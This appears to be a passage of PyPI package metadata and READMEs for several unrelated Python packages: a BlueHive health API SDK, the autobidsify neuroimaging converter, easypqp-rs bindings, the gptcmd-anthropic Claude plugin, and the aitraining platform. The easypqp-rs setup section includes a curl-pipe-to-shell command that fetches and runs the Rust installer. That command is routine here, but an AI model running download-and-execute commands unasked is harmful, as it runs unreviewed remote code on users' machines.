Code](https://img.shields.io/badge/_-Add_to_VS_Code-blue?style=for-the-badge&logo=data:image/svg%2bxml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGZpbGw9Im5vbmUiIHZpZXdCb3g9IjAgMCA0MCA0MCI+PHBhdGggZmlsbD0iI0VFRSIgZmlsbC1ydWxlPSJldmVub2RkIiBkPSJNMzAuMjM1IDM5Ljg4NGEyLjQ5MSAyLjQ5MSAwIDAgMS0xLjc4MS0uNzMwTDEyLjcgMjQuNzhsLTMuNDYgMi42MjQtMy40MDYgMi41ODJhMS42NjUgMS42NjUgMCAwIDEtMS4wODIuMzM4IDEuNjY0IDEuNjY0IDAgMCAxLTEuMDQ2LS40MzFsLTIuMi0yYTEuNjY2IDEuNjY2IDAgMCAxIDAtMi40NjNMNy40NTggMjAgNC42NyAxNy40NTMgMS41MDcgMTQuNTdhMS42NjUgMS42NjUgMCAwIDEgMC0yLjQ2M2wyLjItMmExLjY2NSAxLjY2NSAwIDAgMSAyLjEzLS4wOTdsNi44NjMgNS4yMDlMMjguNDUyLjg0NGEyLjQ4OCAyLjQ4OCAwIDAgMSAxLjg0MS0uNzI5Yy4zNTEuMDA5LjY5OS4wOTEgMS4wMTkuMjQ1bDguMjM2IDMuOTYxYTIuNSAyLjUgMCAwIDEgMS40MTUgMi4yNTN2LjA5OS0uMDQ1VjMzLjM3di0uMDQ1LjA5NWEyLjUwMSAyLjUwMSAwIDAgMS0xLjQxNiAyLjI1N2wtOC4yMzUgMy45NjFhMi40OTIgMi40OTIgMCAwIDEtMS4wNzcuMjQ2Wm0uNzE2LTI4Ljk0Ny0xMS45NDggOS4wNjIgMTEuOTUyIDkuMDY1LS4wMDQtMTguMTI3WiIvPjwvc3ZnPg==)](https://vscode.stainless.com/mcp/%7B%22name%22%3A%22%40bluehive%2Fsdk-mcp%22%2C%22command%22%3A%22npx%22%2C%22args%22%3A%5B%22-y%22%2C%22%40bluehive%2Fsdk-mcp%22%5D%2C%22env%22%3A%7B%22BLUEHIVE_API_KEY%22%3A%22My%20API%20Key%22%7D%7D) > Note: You may need to set environment variables in your MCP client. ## Documentation The REST API documentation can be found on [docs.bluehive.com](https://docs.bluehive.com/). The full API of this library can be found in [api.md](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/api.md). ## Installation ```sh # install from PyPI pip install --pre bluehive ``` ## Usage The full API of this library can be found in [api.md](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/api.md). 
```python from bluehive import BlueHive client = BlueHive() response = client.health.check() print(response.status) ``` While you can provide an `api_key` keyword argument, we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/) to add `BLUEHIVE_API_KEY="My API Key"` to your `.env` file so that your API Key is not stored in source control. ## Async usage Simply import `AsyncBlueHive` instead of `BlueHive` and use `await` with each API call: ```python import asyncio from bluehive import AsyncBlueHive client = AsyncBlueHive() async def main() -> None: response = await client.health.check() print(response.status) asyncio.run(main()) ``` Functionality between the synchronous and asynchronous clients is otherwise identical. ### With aiohttp By default, the async client uses `httpx` for HTTP requests. However, for improved concurrency performance you may also use `aiohttp` as the HTTP backend. You can enable this by installing `aiohttp`: ```sh # install from PyPI pip install --pre 'bluehive[aiohttp]' ``` Then you can enable it by instantiating the client with `http_client=DefaultAioHttpClient()`: ```python import asyncio from bluehive import DefaultAioHttpClient from bluehive import AsyncBlueHive async def main() -> None: async with AsyncBlueHive( http_client=DefaultAioHttpClient(), ) as client: response = await client.health.check() print(response.status) asyncio.run(main()) ``` ## Using types Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like: - Serializing back into JSON, `model.to_json()` - Converting to a dictionary, `model.to_dict()` Typed requests and responses provide autocomplete and documentation within your editor. If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`. 
## Nested params Nested parameters are dictionaries, typed using `TypedDict`, for example: ```python from bluehive import BlueHive client = BlueHive() response = client.fax.send( document={ "content": "content", "content_type": "application/pdf", }, to="to", ) print(response.document) ``` ## Handling errors When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `bluehive.APIConnectionError` is raised. When the API returns a non-success status code (that is, 4xx or 5xx response), a subclass of `bluehive.APIStatusError` is raised, containing `status_code` and `response` properties. All errors inherit from `bluehive.APIError`. ```python import bluehive from bluehive import BlueHive client = BlueHive() try: client.health.check() except bluehive.APIConnectionError as e: print("The server could not be reached") print(e.__cause__) # an underlying Exception, likely raised within httpx. except bluehive.RateLimitError as e: print("A 429 status code was received; we should back off a bit.") except bluehive.APIStatusError as e: print("Another non-200-range status code was received") print(e.status_code) print(e.response) ``` Error codes are as follows: | Status Code | Error Type | | ----------- | -------------------------- | | 400 | `BadRequestError` | | 401 | `AuthenticationError` | | 403 | `PermissionDeniedError` | | 404 | `NotFoundError` | | 422 | `UnprocessableEntityError` | | 429 | `RateLimitError` | | >=500 | `InternalServerError` | | N/A | `APIConnectionError` | ### Retries Certain errors are automatically retried 2 times by default, with a short exponential backoff. Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict, 429 Rate Limit, and >=500 Internal errors are all retried by default. 
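The retry behavior described above (a small number of retries with a short exponential backoff, applied only to retryable status codes) can be sketched generically. This is not the library's internal code; `call_with_retries` and its parameters are hypothetical, shown only to make the policy concrete:

```python
# Generic retry-with-exponential-backoff sketch (hypothetical helper,
# not bluehive's internals). Retryable statuses mirror the list above:
# connection-level failures aside, 408, 409, 429, and >=500 are retried.
RETRYABLE = {408, 409, 429} | set(range(500, 600))

def call_with_retries(send, max_retries=2, base_delay=0.5):
    """Call send() until it returns a non-retryable status or retries run out.

    send() returns an int status code. The backoff delay doubles each
    attempt (base_delay * 2**attempt); a real client would sleep here.
    """
    status = send()
    for attempt in range(max_retries):
        if status not in RETRYABLE:
            break
        _delay = base_delay * (2 ** attempt)  # e.g. time.sleep(_delay)
        status = send()
    return status

# Simulated server: fails twice with 429, then succeeds.
responses = iter([429, 429, 200])
assert call_with_retries(lambda: next(responses)) == 200
```

With the default of two retries, a request that fails three times in a row is surfaced to the caller after the third attempt, which matches the "retried twice by default" behavior the README describes.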
You can use the `max_retries` option to configure or disable retry settings: ```python from bluehive import BlueHive # Configure the default for all requests: client = BlueHive( # default is 2 max_retries=0, ) # Or, configure per-request: client.with_options(max_retries=5).health.check() ``` ### Timeouts By default requests time out after 1 minute. You can configure this with a `timeout` option, which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object: ```python import httpx from bluehive import BlueHive # Configure the default for all requests: client = BlueHive( # 20 seconds (default is 1 minute) timeout=20.0, ) # More granular control: client = BlueHive( timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0), ) # Override per-request: client.with_options(timeout=5.0).health.check() ``` On timeout, an `APITimeoutError` is thrown. Note that requests that time out are [retried twice by default](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/#retries). ## Advanced ### Logging We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module. You can enable logging by setting the environment variable `BLUE_HIVE_LOG` to `info`. ```shell $ export BLUE_HIVE_LOG=info ``` Or to `debug` for more verbose logging. ### How to tell whether `None` means `null` or missing In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`: ```py if response.my_field is None: if 'my_field' not in response.model_fields_set: print('Got json like {}, without a "my_field" key present at all.') else: print('Got json like {"my_field": null}.') ``` ### Accessing raw response data (e.g. 
headers) The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g., ```py from bluehive import BlueHive client = BlueHive() response = client.health.with_raw_response.check() print(response.headers.get('X-My-Header')) health = response.parse() # get the object that `health.check()` would have returned print(health.status) ``` These methods return an [`APIResponse`](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/src/bluehive/_response.py) object. The async client returns an [`AsyncAPIResponse`](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/src/bluehive/_response.py) with the same structure, the only difference being `await`able methods for reading the response content. #### `.with_streaming_response` The above interface eagerly reads the full response body when you make the request, which may not always be what you want. To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods. ```python with client.health.with_streaming_response.check() as response: print(response.headers.get("X-My-Header")) for line in response.iter_lines(): print(line) ``` The context manager is required so that the response will reliably be closed. ### Making custom/undocumented requests This library is typed for convenient access to the documented API. If you need to access undocumented endpoints, params, or response properties, the library can still be used. #### Undocumented endpoints To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other http verbs. Options on the client will be respected (such as retries) when making this request. 
```py import httpx response = client.post( "/foo", cast_to=httpx.Response, body={"my_param": True}, ) print(response.headers.get("x-foo")) ``` #### Undocumented request params If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request options. #### Undocumented response properties To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You can also get all the extra fields on the Pydantic model as a dict with [`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra). ### Configuring the HTTP client You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including: - Support for [proxies](https://www.python-httpx.org/advanced/proxies/) - Custom [transports](https://www.python-httpx.org/advanced/transports/) - Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality ```python import httpx from bluehive import BlueHive, DefaultHttpxClient client = BlueHive( # Or use the `BLUE_HIVE_BASE_URL` env var base_url="http://my.test.server.example.com:8083", http_client=DefaultHttpxClient( proxy="http://my.test.proxy.example.com", transport=httpx.HTTPTransport(local_address="0.0.0.0"), ), ) ``` You can also customize the client on a per-request basis by using `with_options()`: ```python client.with_options(http_client=DefaultHttpxClient(...)) ``` ### Managing HTTP resources By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting. ```py from bluehive import BlueHive with BlueHive() as client: # make requests here ... 
# HTTP client is now closed ``` ## Versioning This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions: 1. Changes that only affect static types, without breaking runtime behavior. 2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_ 3. Changes that we do not expect to impact the vast majority of users in practice. We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience. We are keen for your feedback; please open an [issue](https://www.github.com/bluehive-health/bluehive-sdk-python/issues) with questions, bugs, or suggestions. ### Determining the installed version If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version. You can determine the version that is being used at runtime with: ```py import bluehive print(bluehive.__version__) ``` ## Requirements Python 3.9 or higher. ## Contributing See [the contributing documentation](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/./CONTRIBUTING.md).
text/markdown
null
BlueHive <wreiske@bluehive.com>
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: MacOS", "Operating System :: Microsoft :: Windows", "Operating System :: OS Independent", "Operating System :: POSIX", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: ...
[]
null
null
>=3.9
[]
[]
[]
[ "anyio<5,>=3.5.0", "distro<2,>=1.7.0", "httpx<1,>=0.23.0", "pydantic<3,>=1.9.0", "sniffio", "typing-extensions<5,>=4.10", "aiohttp; extra == \"aiohttp\"", "httpx-aiohttp>=0.1.9; extra == \"aiohttp\"" ]
[]
[]
[]
[ "Homepage, https://github.com/bluehive-health/bluehive-sdk-python", "Repository, https://github.com/bluehive-health/bluehive-sdk-python" ]
twine/5.1.1 CPython/3.12.9
2026-02-19T22:16:40.488006
bluehive-0.1.0a26.tar.gz
135,478
f8/26/ae6db3c95a14ee7bc5cda6ec32f0348b5b220188402951503eac1e297f98/bluehive-0.1.0a26.tar.gz
source
sdist
null
false
4a6880d0f62288268e152fa9392084c0
fda8009f3acae5647ebad53f135fbda1a2f06499f726f12aa71609687dc49edc
f826ae6db3c95a14ee7bc5cda6ec32f0348b5b220188402951503eac1e297f98
null
[]
221
2.4
autobidsify
0.5.0
Automated BIDS standardization tool powered by LLM-first architecture
# auto-bidsify Automated BIDS standardization tool powered by LLM-first architecture. ## Features - **General compatibility**: Handles diverse dataset structures (flat, hierarchical, multi-site) - **Multi-modal support**: MRI, fNIRS, and mixed modality datasets - **Intelligent metadata extraction**: Automatic participant demographics from DICOM headers, documents, and filenames - **Format conversion**: DICOM→NIfTI, CSV→SNIRF, and more - **Evidence-based reasoning**: Confidence scoring and provenance tracking for all decisions ## Supported Formats **Input formats:** - MRI: DICOM, NIfTI (.nii, .nii.gz) - fNIRS: SNIRF, Homer3 (.nirs), CSV/TSV tables - Documents: PDF, DOCX, TXT, Markdown, ... **Output:** BIDS-compliant dataset (v1.10.0) ## Quick Start ### Installation ```bash # Clone repository git clone https://github.com/yourusername/auto-bidsify.git cd auto-bidsify # Setup environment conda create -n bidsify python=3.10 conda activate bidsify pip install -r requirements.txt # Set OpenAI API key export OPENAI_API_KEY="your-key-here" ``` ### Basic Usage ```bash # Full pipeline (one command) python cli.py full \ --input /path/to/your/data \ --output outputs/my_dataset \ --model gpt-4o \ --modality mri # Step-by-step execution python cli.py ingest --input data.zip --output outputs/run python cli.py evidence --output outputs/run --modality mri python cli.py trio --output outputs/run --model gpt-4o python cli.py plan --output outputs/run --model gpt-4o python cli.py execute --output outputs/run python cli.py validate --output outputs/run ``` ### Command Options ```bash --input PATH Input data (archive or directory) --output PATH Output directory --model MODEL LLM model (default: gpt-4o) --modality TYPE Data modality: mri|nirs|mixed --nsubjects N Number of subjects (optional) --describe "TEXT" Dataset description (recommended) ``` ## Pipeline Stages | Stage | Command | Input | Output | Purpose | 
|-------|-------------|-----------------|----------------------------|------------------------------------| | 1 | `ingest` | Raw data | `ingest_info.json` | Extract/reference data | | 2 | `evidence` | All files | `evidence_bundle.json` | Analyze structure, detect subjects | | 3 | `classify` | Mixed data | `classification_plan.json` | Separate MRI/fNIRS (optional) | | 4 | `trio` | Evidence | BIDS trio files | Generate metadata files | | 5 | `plan` | Evidence + trio | `BIDSPlan.yaml` | Create conversion strategy | | 6 | `execute` | Plan | `bids_compatible/` | Execute conversions | | 7 | `validate` | BIDS dataset | Validation report | Check compliance | ## Output Structure ``` outputs/my_dataset/ bids_compatible/ # Final BIDS dataset dataset_description.json README.md participants.tsv sub-001/ anat/ sub-001_T1w.nii.gz func/ sub-001_task-rest_bold.nii.gz _staging/ # Intermediate files evidence_bundle.json BIDSPlan.yaml conversion_log.json ``` ## Examples ### Example 1: Single-site MRI study ```bash python cli.py full \ --input brain_scans/ \ --output outputs/study1 \ --nsubjects 50 \ --model gpt-4o \ --modality mri ``` ### Example 2: Multi-site dataset with description ```bash python cli.py full \ --input camcan_data/ \ --output outputs/camcan \ --model gpt-4o \ --modality mri \ --describe "Cambridge Centre for Ageing and Neuroscience: 650 participants, ages 18-88, multi-site MRI study" ``` ### Example 3: fNIRS dataset from CSV ```bash python cli.py full \ --input fnirs_study/ \ --output outputs/fnirs \ --model gpt-4o \ --modality nirs \ --describe "Prefrontal cortex activation during cognitive tasks, 30 subjects" ``` ## Architecture **LLM-First Design:** - **Python**: Deterministic operations (file I/O, format conversion, validation) - **LLM**: Semantic understanding (file classification, metadata extraction, pattern recognition) - **Hybrid**: Best of both worlds - reliability + flexibility ## Requirements - Python 3.10+ - OpenAI API key - Optional: `dcm2niix` for 
DICOM conversion - Optional: `bids-validator` for validation ## Current Status **Version:** 1.0 (LLM-First Architecture with Evidence-Based Reasoning) **Tested datasets:** - Visible Human Project (flat structure, CT scans) - CamCAN (hierarchical, multi-site, 1288 subjects) - [Your dataset here - help us test!] **Known limitations:** - Classification stage (Stage 3) and mat/spreadsheet conversion are experimental - Some edge cases in participant metadata extraction ## Contributing We need YOUR datasets to improve robustness! Please test and report: - Success cases - Failure cases - Edge cases
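The `sub-001_task-rest_bold.nii.gz` names in the output tree above follow BIDS's key-value entity scheme (`key-value` pairs joined by underscores, then a suffix and extension). A minimal sketch of composing such a name; this helper is illustrative and not part of auto-bidsify:

```python
# Compose a BIDS-style filename from ordered entities plus a suffix and
# extension. Illustrative helper only, not part of auto-bidsify.
def bids_name(entities, suffix, ext=".nii.gz"):
    """entities is an ordered mapping like {"sub": "001", "task": "rest"}."""
    parts = [f"{key}-{value}" for key, value in entities.items()]
    return "_".join(parts + [suffix]) + ext

print(bids_name({"sub": "001", "task": "rest"}, "bold"))
# sub-001_task-rest_bold.nii.gz
print(bids_name({"sub": "001"}, "T1w"))
# sub-001_T1w.nii.gz
```

Entity order matters in BIDS (`sub` before `task`, and so on), which is why an ordered mapping is used rather than sorting the keys.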
text/markdown
null
Yiyi Liu <yiyi.liu3@northeastern.edu>
null
Yiyi Liu <yiyi.liu3@northeastern.edu>
MIT
bids, brain-imaging, data-standardization, dicom, fnirs, medical-imaging, mri, neuroimaging, nifti
[ "Development Status :: 4 - Beta", "Intended Audience :: Healthcare Industry", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language ...
[]
null
null
>=3.10
[]
[]
[]
[ "h5py>=3.8.0", "nibabel>=5.0.0", "numpy>=1.24.0", "openai>=1.0.0", "openpyxl>=3.1.0", "pandas>=2.0.0", "pdfplumber>=0.10.0", "pydicom>=2.4.0", "pypdf2>=3.0.0", "python-docx>=1.0.0", "pyyaml>=6.0", "scipy>=1.10.0", "black>=23.0; extra == \"all\"", "mypy>=1.0; extra == \"all\"", "myst-pars...
[]
[]
[]
[ "Homepage, https://github.com/fangzhouliucode/autobidsify", "Documentation, https://autobidsify.readthedocs.io", "Repository, https://github.com/fangzhouliucode/autobidsify", "Issues, https://github.com/fangzhouliucode/autobidsify/issues", "Changelog, https://github.com/fangzhouliucode/autobidsify/blob/main...
twine/6.2.0 CPython/3.10.12
2026-02-19T22:16:14.063049
autobidsify-0.5.0.tar.gz
67,898
49/e8/99104c64cc129704241dc8b29a038aff0aba6994fd12228e957a5b576b93/autobidsify-0.5.0.tar.gz
source
sdist
null
false
af5ef462608b14b6ba1febca16c2e247
08788b709d32b4cedfadee60bbe16f9d67c5224b72ab6227d4100905f46d96aa
49e899104c64cc129704241dc8b29a038aff0aba6994fd12228e957a5b576b93
null
[]
248
2.4
easypqp-rs
0.1.7
Python bindings for EasyPQP-rs
# easypqp-py: Python Bindings for EasyPQP

[![PyPI - Version](https://img.shields.io/pypi/v/easypqp-rs)](https://pypi.org/project/easypqp-rs/)

Python bindings for the [EasyPQP Rust library](https://github.com/justinsing/easypqp-rs). The Rust library is currently used mainly for in-silico peptide query parameter generation.

## Prerequisites

### System Requirements

- **Rust**: 1.70 or newer
- **Python**: 3.10 or newer
- **Cargo**: Latest stable version
- **pip**: Python package manager

### Optional (Linux only)

For optimal binary compatibility on Linux, install `patchelf`:

```bash
# Debian/Ubuntu
sudo apt-get install patchelf

# Arch Linux
sudo pacman -S patchelf

# Via pip (alternative)
pip install maturin[patchelf]
```

## Installation

### Option 1: Development Installation (Editable Mode)

```bash
# Navigate to the easypqp-py directory
cd easypqp-py

# Install in development mode
maturin develop

# Or with optimizations enabled
maturin develop --release
```

### Option 2: Build and Install from Source

```bash
cd easypqp-py

# Build the wheel
maturin build

# Install the built wheel
pip install target/wheels/easypqp_rs-*.whl
```

### Option 3: Install via pip (when published)

```bash
pip install easypqp_rs
```

## Development

### Setting Up Development Environment

```bash
# Clone the repository
git clone https://github.com/justinsing/easypqp-rs.git
cd easypqp-rs/easypqp-py

# Install Rust (if not already installed)
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh

# Install maturin
pip install maturin

# Set up Python virtual environment (optional but recommended)
python -m venv .venv
source .venv/bin/activate  # On Windows: .venv\Scripts\activate

# Install in development mode
maturin develop
```

### Common Build Commands

```bash
# Build in debug mode (faster builds)
maturin develop

# Build in release mode (optimized)
maturin develop --release

# Clean and rebuild
maturin develop --clean

# Build with specific features
maturin develop --features parquet

# Build without installing into the environment
maturin develop --skip-install
```

### Testing the Installation

```python
import easypqp_rs

# Test basic functionality
print(easypqp_rs.__version__)  # Check if module loads
```
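As a gentler variant of the import check above, a stdlib-only sketch (generic Python, not part of easypqp-rs) can report a missing extension module without raising `ImportError`:

```python
import importlib.util

def is_installed(module_name: str) -> bool:
    """Return True if the interpreter can locate the named module."""
    return importlib.util.find_spec(module_name) is not None

# Reports availability instead of crashing when the wheel is absent.
print("easypqp_rs installed:", is_installed("easypqp_rs"))
```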
text/markdown; charset=UTF-8; variant=GFM
null
Justin Sing <justincsing@gmail.com>
null
null
BSD-3-Clause
mass-spectrometry, bioinformatics, proteomics
[ "Development Status :: 3 - Alpha", "Intended Audience :: Science/Research", "License :: OSI Approved :: BSD License", "Programming Language :: Rust", "Programming Language :: Python :: Implementation :: PyPy", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Program...
[]
null
null
>=3.9
[]
[]
[]
[]
[]
[]
[]
[ "Documentation, https://github.com/singjc/easypqp-rs", "Homepage, https://github.com/singjc/easypqp-rs", "Repository, https://github.com/singjc/easypqp-rs" ]
maturin/1.12.3
2026-02-19T22:16:06.391684
easypqp_rs-0.1.7-cp313-cp313-win_amd64.whl
14,547,048
de/ac/68e5ac90cbd1a641daec24f5c3f4d15c6d6b5d01007a2005207a6e63624b/easypqp_rs-0.1.7-cp313-cp313-win_amd64.whl
cp313
bdist_wheel
null
false
057add9d86d71758a48583632873c425
22fb6a925704994b60ebd52e61dffb20dc4a198d9e818b1803ef90d0b496000e
deac68e5ac90cbd1a641daec24f5c3f4d15c6d6b5d01007a2005207a6e63624b
null
[]
911
2.4
gptcmd-anthropic
2.3.0
Anthropic model support for Gptcmd
# Gptcmd-anthropic

Gptcmd-anthropic adds support for [Anthropic](https://anthropic.com)'s Claude models to [Gptcmd](https://github.com/codeofdusk/gptcmd). [Python](https://python.org) 3.8.6 or later, Gptcmd 2.2.0 or later, and an [Anthropic API key](https://console.anthropic.com/account/keys) are required to use this package. Gptcmd-anthropic is available on PyPI and can, for instance, be installed with `pip install gptcmd-anthropic` at a command line shell.

## Configuration

To use Gptcmd-anthropic, you'll need to add a new account to your Gptcmd configuration or modify your default account. If no `api_key` is specified in your configuration, Gptcmd-anthropic uses the API key in the `ANTHROPIC_API_KEY` environment variable. An example configuration follows:

``` toml
[accounts.claude]
provider = "anthropic"
api_key = "sk-ant-xxxxx"  # Replace with your API key
# Though not required, specifying a model in your configuration, similar to
# openai and azure accounts, will use that model by default
model = "claude-3-5-sonnet-latest"
# Any additional options are passed directly to the Python Anthropic client's
# constructor for this account.
```

## Usage

If you've configured multiple accounts, the `account` command in Gptcmd can be used to switch between them:

```
(gpt-4o) account claude
Switched to account 'claude'
(claude-3-5-sonnet-latest) account default
Switched to account 'default'
(gpt-4o)
```

Consult Gptcmd's readme for additional usage instructions.

## Prompt caching

To save costs, Gptcmd-anthropic dynamically inserts [cache breakpoints](https://docs.anthropic.com/en/docs/build-with-claude/prompt-caching) on the system message (if present), the final user message, and the largest messages of a conversation based on content length and number of attachments. You may override this dynamic strategy on a per-message basis by setting the `anthropic_cache_breakpoint` metadata field:

* If set to `True`, the message will always be cached.
* If set to `False`, the message will never be cached.
* If a span of consecutive messages of the same role contains conflicting breakpoint metadata (one message set to always cache, the next set to never cache), the entire span will be cached.

For instance:

```
(claude-opus-4-20250514) user Cache me!
'Cache me!' added as user
(claude-opus-4-20250514) meta anthropic_cache_breakpoint True
anthropic_cache_breakpoint set to True on 'Cache me!'
```

## Extended thinking

You may enable extended thinking with a command like `set thinking {"type": "enabled", "budget_tokens": 1024}`. When extended thinking mode is enabled, a summary of the thinking process can be found in the `anthropic_thinking_text` metadata field on the generated assistant message.

```
(claude-opus-4-20250514) set thinking {"type": "enabled", "budget_tokens": 1024}
thinking set to {'type': 'enabled', 'budget_tokens': 1024}
(claude-opus-4-20250514) say The quick brown fox jumps over the lazy dog.
...
That's the famous pangram! It's a sentence that contains every letter of the English alphabet at least once. It's commonly used for:

- Testing typewriters and keyboards
- Displaying font samples
- Practicing typing
- Testing telecommunication equipment

It uses exactly 35 letters total and has been popular since at least the late 1800s.

Is there something specific you'd like to know about this sentence, or were you perhaps testing something?
(claude-opus-4-20250514) meta anthropic_thinking_text
'The user has sent me the famous pangram "The quick brown fox jumps over the lazy dog." This sentence contains all 26 letters of the English alphabet at least once. They haven\'t asked me to do anything specific with it, so I should acknowledge it and perhaps share something interesting about it.'
```

Newer models support an "adaptive" thinking mode with graduated levels rather than a strict thinking budget. This feature requires version 0.77.0 or later of the Anthropic Python library:

```
(claude-opus-4-6) set thinking {"type": "adaptive"}
thinking set to {'type': 'adaptive'}
(claude-opus-4-6) set output_config {"effort": "max"}
output_config set to {'effort': 'max'}
```

If you use this feature frequently, you might find a macro like this helpful (add it to the `[macros]` section of your Gptcmd configuration, adding the section if it doesn't exist). Replace `claude` below with the name of your Gptcmd-anthropic account:

``` toml
[macros]
ct = """
account claude
set thinking {{"type": "adaptive"}}
set output_config {{"effort": "{1?max}"}}
"""
```

Then, the `ct` command will enable thinking at the "max" reasoning level by default, or at the level passed as an argument to the macro.

## Server-side tools

Tools provided by Anthropic, such as web search, may be used. However, tool responses (such as search citations) are not currently stored, displayed, or passed back to the model. To search the web with Claude, you might wish to add a macro like this to the `[macros]` section of your Gptcmd configuration (the first argument specifies the maximum number of searches allowed, default 5). If you also added the thinking macro, you might replace `account claude` in this macro with an invocation of that one, or add this `set` line to that macro:

``` toml
[macros]
cw = """
account claude
set tools [{{"type": "web_search_20250305", "name": "web_search", "max_uses": {1?5}}}]
"""
```
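The dynamic breakpoint strategy described under "Prompt caching" might be sketched roughly like this in plain Python (an illustrative heuristic only, not Gptcmd-anthropic's actual implementation; the message-dict shape and `meta` field are hypothetical, and the consecutive-span conflict rule is omitted for brevity):

```python
def pick_cache_breakpoints(messages, max_breakpoints=4):
    """Pick indices of messages to cache: the system message, the final
    user message, then the largest remaining messages by content length.
    Explicit anthropic_cache_breakpoint metadata overrides the heuristic."""
    chosen = set()
    forced_off = set()
    for i, msg in enumerate(messages):
        override = msg.get("meta", {}).get("anthropic_cache_breakpoint")
        if override is True:
            chosen.add(i)
        elif override is False:
            forced_off.add(i)
    # The system message, if present, is always a candidate.
    for i, msg in enumerate(messages):
        if msg["role"] == "system":
            chosen.add(i)
            break
    # The final user message is always a candidate.
    for i in range(len(messages) - 1, -1, -1):
        if messages[i]["role"] == "user":
            chosen.add(i)
            break
    # Fill remaining breakpoint slots with the largest messages.
    by_size = sorted(range(len(messages)),
                     key=lambda i: len(messages[i]["content"]), reverse=True)
    for i in by_size:
        if len(chosen) >= max_breakpoints:
            break
        chosen.add(i)
    return sorted(chosen - forced_off)
```

The `max_breakpoints=4` default mirrors the Anthropic API's limit of four cache breakpoints per request.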
text/markdown
null
Bill Dengler <codeofdusk@gmail.com>
null
null
null
null
[ "Programming Language :: Python :: 3", "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)", "Operating System :: OS Independent" ]
[]
null
null
>=3.8.6
[]
[]
[]
[ "gptcmd>=2.2.0", "anthropic<1.0.0,>=0.47.0" ]
[]
[]
[]
[ "Homepage, https://github.com/codeofdusk/gptcmd-anthropic", "Bug Tracker, https://github.com/codeofdusk/gptcmd-anthropic/issues" ]
twine/6.2.0 CPython/3.13.11
2026-02-19T22:14:55.194618
gptcmd_anthropic-2.3.0.tar.gz
27,728
7d/a0/b1016a8533a90d97d549a3d2bf802e7fc9e78c91791481bfdd5c8e67f4d9/gptcmd_anthropic-2.3.0.tar.gz
source
sdist
null
false
e0b43614ef69d5650ea4b14b8c882251
5357468febe2632cbe0a30a0a7871071a556e9d80575fe3a237d3e894891b746
7da0b1016a8533a90d97d549a3d2bf802e7fc9e78c91791481bfdd5c8e67f4d9
null
[ "COPYING.txt" ]
236
2.4
aitraining
0.0.44
Advanced Machine Learning Training Platform - IN DEVELOPMENT
<p align="center"> <img src="https://raw.githubusercontent.com/monostate/aitraining/main/docs/images/terminal-wizard.png" alt="AITraining Interactive Wizard" width="700"> </p>

<p align="center">
  <a href="https://pypi.org/project/aitraining/"><img src="https://img.shields.io/pypi/v/aitraining.svg" alt="PyPI version"></a>
  <a href="https://pypi.org/project/aitraining/"><img src="https://img.shields.io/pypi/pyversions/aitraining.svg" alt="Python versions"></a>
  <a href="https://github.com/monostate/aitraining/blob/main/LICENSE"><img src="https://img.shields.io/badge/License-Apache%202.0-blue.svg" alt="License"></a>
  <a href="https://docs.monostate.com"><img src="https://img.shields.io/badge/docs-monostate.com-FF6B35.svg" alt="Documentation"></a>
  <a href="https://deepwiki.com/monostate/aitraining"><img src="https://deepwiki.com/badge.svg" alt="Ask DeepWiki"></a>
</p>

<p align="center"> <b>Train state-of-the-art ML models with minimal code</b> </p>

<p align="center"> English | <a href="README_PTBR.md">Portugues</a> </p>

<p align="center"> 📚 <b><a href="https://docs.monostate.com">Full Documentation →</a></b> </p>

---

> **📖 Comprehensive Documentation Available**
>
> Visit **[docs.monostate.com](https://docs.monostate.com)** for detailed guides, tutorials, API reference, and examples covering all features including LLM fine-tuning, PEFT/LoRA, DPO/ORPO training, hyperparameter sweeps, and more.

---

AITraining is an advanced machine learning training platform built on top of [AutoTrain Advanced](https://github.com/huggingface/autotrain-advanced). It provides a streamlined interface for fine-tuning LLMs, vision models, and more.
